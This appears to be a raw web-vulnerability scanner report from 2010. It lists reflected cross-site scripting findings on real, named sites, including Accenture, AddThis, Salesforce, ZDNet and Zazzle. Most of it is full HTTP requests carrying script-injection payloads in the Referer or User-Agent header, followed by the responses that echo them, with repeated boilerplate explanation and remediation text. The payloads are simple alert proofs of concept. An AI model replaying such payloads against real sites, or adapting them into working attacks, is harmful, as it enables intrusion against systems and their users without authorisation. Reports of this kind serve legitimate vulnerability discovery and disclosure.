GET /Global/Registration/Personalization HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: d0b3c"%3balert(1)//dafb89c6dc9
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:45:39 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:45:38 GMT; path=/ Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=%3cp%3eThank+you+for+registering+to+the+site+and+Personalization.+As+a+registered+user+there+are+a+variety+of+special+features+available+to+you%2c+such+as+a+personalized+information+on+%22Your+Content%22+page%2c+email+alerts+on+new+material+of+interest+and+newsletters+which+summarize+our+best+new+content.+Please+visit+%3ca+href%3d%22EAN.aspx%22%3eEmail+Alerts+and+Newsletters%3c%2fa%3e+for+more+information+on+these+topics+and+to+modify+your+profile.%3c%2fp%3e&ThankYouPageTitle=Confirmation&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/ Set-Cookie: FormSubmitURL=ThankYouPage.aspx; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 110320
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title id="pageTitle">accenture.com Personalization Registration</title> <META http-equiv="Content-Type" conten ...[SNIP]... script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="global/registration/personalization.htm" var formPageReferrer="accenture/registration/d0b3c";alert(1)//dafb89c6dc9" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49479"%3balert(1)//08812ad7b8a was submitted in the Referer HTTP header. This input was echoed as 49479";alert(1)//08812ad7b8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Global/Registration/RequestServices.htm?link=%2fAccenture%2fRegistration%2fEAN.aspx HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: 49479"%3balert(1)//08812ad7b8a
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:46:04 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:04 GMT; path=/ Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=&ThankYouPageTitle=Confirmation&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/ Set-Cookie: FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 88917
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title id="pageTitle">Request for Services</title> <META http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="global/registration/requestservices.htm" var formPageReferrer="accenture/registration/49479";alert(1)//08812ad7b8a" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae01"%3balert(1)//ee29f38111e was submitted in the Referer HTTP header. This input was echoed as dae01";alert(1)//ee29f38111e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=Submit HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: dae01"%3balert(1)//ee29f38111e
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:47:08 GMT Content-Length: 8044 Connection: close Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:08 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache
<title>Submit</title> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>PrintThis</title>
<meta content="Microsoft Visual Studio 7.0" name="GENERATOR"> ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="accenture/registration/printthis.aspx" var formPageReferrer="accenture/registration/dae01";alert(1)//ee29f38111e" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 750b6"%3balert(1)//fa0abef87abb5e8ef was submitted in the Referer HTTP header. This input was echoed as 750b6";alert(1)//fa0abef87abb5e8ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sun, 21 Nov 2010 17:15:39 GMT Connection: keep-alive Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/ Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:40 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 8224
<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda</title> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>PrintThis</title>
<meta ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="accenture/registration/printthis.aspx" var formPageReferrer="accenture/registration/750b6";alert(1)//fa0abef87abb5e8ef" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c22f"%3balert(1)//0189a8276ee was submitted in the Referer HTTP header. This input was echoed as 3c22f";alert(1)//0189a8276ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global/registration/careerssample HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: 3c22f"%3balert(1)//0189a8276ee
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:45:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:45:35 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 80136
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML lang="en-US"> <HEAD> <title> Accenture Careers Newsletter </title> <META http-equiv="Content-Type" content="te ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="global/registration/careerssample.htm" var formPageReferrer="accenture/templates/3c22f";alert(1)//0189a8276ee" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a64dc<script>alert(1)</script>10cad22189c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a64dc<script>alert(1)</script>10cad22189c
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 17:13:54 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>a64dc<script>alert(1)</script>10cad22189c - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 442cb"><script>alert(1)</script>018cb7f919a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=442cb"><script>alert(1)</script>018cb7f919a
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 17:13:53 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=442cb"><script>alert(1)</script>018cb7f919a" /> ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload df6ad--><a>b09375b98aa was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET / HTTP/1.1 Host: www.pollingplacephotoproject.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)df6ad--><a>b09375b98aa Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 21 Nov 2010 21:44:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=1574839;expires=Tue, 13-Nov-2040 21:44:38 GMT;path=/ Set-Cookie: CFTOKEN=82044851;expires=Tue, 13-Nov-2040 21:44:38 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D1574839%26CFTOKEN%23%3D82044851%23lastvisit%3D%7Bts%20%272010%2D11%2D21%2016%3A44%3A38%27%7D%23timecreated%3D%7Bts%20%272010%2D11%2D21%2016%3A44%3A38%27%7D%23hitcount%3D2%23cftoken%3D82044851%23cfid%3D1574839%23;expires=Tue, 13-Nov-2040 21:44:38 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>
<title>Politics ...[SNIP]... <!-- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)df6ad--><a>b09375b98aa --> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eec27'-alert(1)-'9782758bfae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=eec27'-alert(1)-'9782758bfae
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sun, 21 Nov 2010 21:38:44 GMT Connection: close Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=eec27'-alert(1)-'9782758bfae'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=eec27'-alert(1)-'9782758bfae'; } </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca287'-alert(1)-'079aae087be was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ca287'-alert(1)-'079aae087be
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sun, 21 Nov 2010 21:38:50 GMT Connection: close Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=ca287'-alert(1)-'079aae087be'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=ca287'-alert(1)-'079aae087be'; } </script> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4af02><script>alert(1)</script>a9e8cbe5cda was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /wwgthis.php HTTP/1.1 Host: www.webwag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4af02><script>alert(1)</script>a9e8cbe5cda
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41a95"-alert(1)-"5a42f1c7a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.windowsfordevices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=41a95"-alert(1)-"5a42f1c7a3
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 6217a<script>alert(1)</script>7a36fbe3a8c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /geekdad_mug-168641877038204487?gl=cerebus19&rf=238985042933680695 HTTP/1.1 Host: www.zazzle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6217a<script>alert(1)</script>7a36fbe3a8c
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e88dd<script>alert(1)</script>e6db59895f8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /geekdad_mug-168641877038204487 HTTP/1.1 Host: www.zazzle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e88dd<script>alert(1)</script>e6db59895f8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6e05"><a>57a82352eda was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: e6e05"><a>57a82352eda
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58b2"><a>f6d26512e03 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: a58b2"><a>f6d26512e03
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74336"><a>4a81cf23a9d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 74336"><a>4a81cf23a9d
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7797"><a>311d03eabfd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /search HTTP/1.1 Host: www.zdnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: e7797"><a>311d03eabfd
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35936"><a>f54325b105e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
